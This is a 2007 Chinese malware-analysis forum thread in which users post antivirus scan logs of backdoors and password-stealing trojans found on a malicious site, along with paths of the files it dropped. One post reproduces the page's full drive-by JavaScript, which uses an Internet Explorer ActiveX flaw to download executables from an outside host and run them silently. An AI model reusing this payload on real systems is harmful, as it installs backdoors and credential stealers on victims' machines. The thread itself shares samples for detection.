发个毒网地址

yzt1004

Starting the file scan:

Begin scan in 'C:\Documents and Settings\snowwolf\桌面\复件 virus23'
C:\Documents and Settings\snowwolf\桌面\复件 virus23\gezi2\gezi2.exe
      [DETECTION] Contains a signature of the (dangerous) backdoor program BDS/Hupigon.Gen Backdoor server programs
      [INFO]      The file was deleted!
C:\Documents and Settings\snowwolf\桌面\复件 virus23\muma\gezi.exe
      [DETECTION] Contains a signature of the (dangerous) backdoor program BDS/Hupigon.Gen Backdoor server programs
      [INFO]      The file was deleted!
C:\Documents and Settings\snowwolf\桌面\复件 virus23\muma\js.exe
      [DETECTION] Is the Trojan horse TR/Delphi.Downloader.Gen
      [INFO]      The file was deleted!
C:\Documents and Settings\snowwolf\桌面\复件 virus23\muma\qq.exe
      [DETECTION] Is the Trojan horse TR/PSW.Hangame.DW
      [INFO]      The file was deleted!
C:\Documents and Settings\snowwolf\桌面\复件 virus23\rising330\rising330.exe
      [DETECTION] Contains suspicious code HEUR/Malware
      [INFO]      The file was moved to '463de1e2.qua'!
---------------------------------------------------------
AVG Anti-Spyware - 扫描报告
---------------------------------------------------------

+ 创建时间:        16:38:54 2007-2-8

+ 扫描结果:       



C:\Documents and Settings\snowwolf\桌面\复件 virus23\muma\qq.exe -> Trojan.Hangame.dw : 已清除.
C:\Documents and Settings\snowwolf\桌面\复件 virus23\muma\js.exe -> Trojan.QQRob.hc : 已清除.


::报告结束
剩余文件已上报AVG

鼻耳盖子

我的IE没有打补丁
C:\WINNT\SYSTEM32\DRIVERS\SVCHOST.EXE C:\WINNT\RISING798.EXE
C:\WINNT\RISING798.EXE C:\PROGRAM FILES\INTERNET EXPLORER\IEXPLORE.EXE
C:\DOCUMENTS AND SETTINGS\MASTER.MASTE\LOCAL SETTINGS\TEMPORARY INTERNET FILES\CONTENT.IE5C:\PROGRAM FILES\BOOS.EXE C:\PROGRAM FILES\INTERNET EXPLORER\IEXPLORE.EXE
C:\DOCUMENTS AND SETTINGS\MASTER.MASTE\LOCAL SETTINGS\TEMPORARY INTERNET FILES\CONTENT.IE5\SHYBSLYJ\DOWN[1].EXE C:\PROGRAM FILES\INTERNET EXPLORER\IEXPLORE.EXE

[ 本帖最后由 鼻耳盖子 于 2007-2-8 17:38 编辑 ]

turkey2k6

我kao，还有这么多啊，我都没发现，

找出来上传。。。

turkey2k6

那个down[1].exe找不到了，谁补上？

龙井茶

下了五个包，第一个卡巴能发现三个，不能删，BOOR这包里发现两个，能杀，其余的不报，AVG一个都不报。

1p1

<SCRIPT>var Words="<script>var url,path
url1="http://vccd.cn/down.exe"
url2="http://vccd.cn/rav.js"
try{var ado=(document.createElement("object"))
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36")
var xml=ado.CreateObject("Microsoft.XMLHTTP","")
var ab="Adodb.";var cd="Stream";var as=ado.createobject(ab+cd,"")
xml.Open("GET",url1,0);xml.Send();as.type=1;as.open()
as.write(xml.responseBody)
as.savetofile("C:\\Program Files\\boos.exe",2)
as.close();}catch(e){}
var url,path
try{var ado=(document.createElement("object"))
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36")
xml.Open("GET",url2,0);xml.Send();as.open()
as.write(xml.responseBody)
as.savetofile("C:\\Program Files\\rav.js",2);as.close()
var shell=ado.createobject("Shell.Application","")
shell.ShellExecute("C:\\Program Files\\rav.js","","","open",0)
}catch(e){}</script>
";document.write(unescape(Words))</SCRIPT>
<script language="javascript" src="http://count30.51yes.com/click.aspx?id=308437152&logo=6"></script>
<script src='http://s102.cnzz.com/stat.php?id=387088&web_id=387088' language='JavaScript' charset='gb2312'></script>

turkey2k6

看来boose.exe就是down.exe

mofunzone

Starting the file scan:

Begin scan in 'C:\Documents and Settings\Administrator\My Documents\muma'
C:\Documents and Settings\Administrator\My Documents\muma\
  gezi.exe
      [DETECTION] Contains a signature of the (dangerous) backdoor program BDS/Hupigon.Gen Backdoor server programs
      [INFO]      The file was deleted!
  js.exe
      [DETECTION] Is the Trojan horse TR/Delphi.Downloader.Gen
      [INFO]      The file was deleted!
  qq.exe
      [DETECTION] Is the Trojan horse TR/PSW.Hangame.DW
      [INFO]      The file was deleted!
  wl.exe

Starting the file scan:

Begin scan in 'C:\Documents and Settings\Administrator\My Documents\rising330.rar'
C:\Documents and Settings\Administrator\My Documents\
  rising330.rar
    [0] Archive type: RAR
    --> rising330.exe
        [DETECTION] Is the Trojan horse TR/Hijack.Explor.2034
        [WARNING]   Infected files in archives cannot be repaired!
        [INFO]      The file was deleted!
wl.exe运行后无反应，已经上报
uploaded files.


A listing of files contained inside archives alongside their results can be found below:File ID         Filename         Size (Byte)        Result
204170         wl.exe         43.161         UNDER ANALYSIS



Please find a detailed report concerning each individual sample below: Filename        Result
wl.exe         UNDER ANALYSIS


The file 'wl.exe' has been determined to be 'UNDER ANALYSIS'.

Please note that you will receive an email which will contain the results shown above. In case the final outcome of the analysis is not yet finished for all files the notification will be sent once ready.

sddy_zkq

我以为我家这个网开不开呢。。好慢。。

ffjjyy

没有反应阿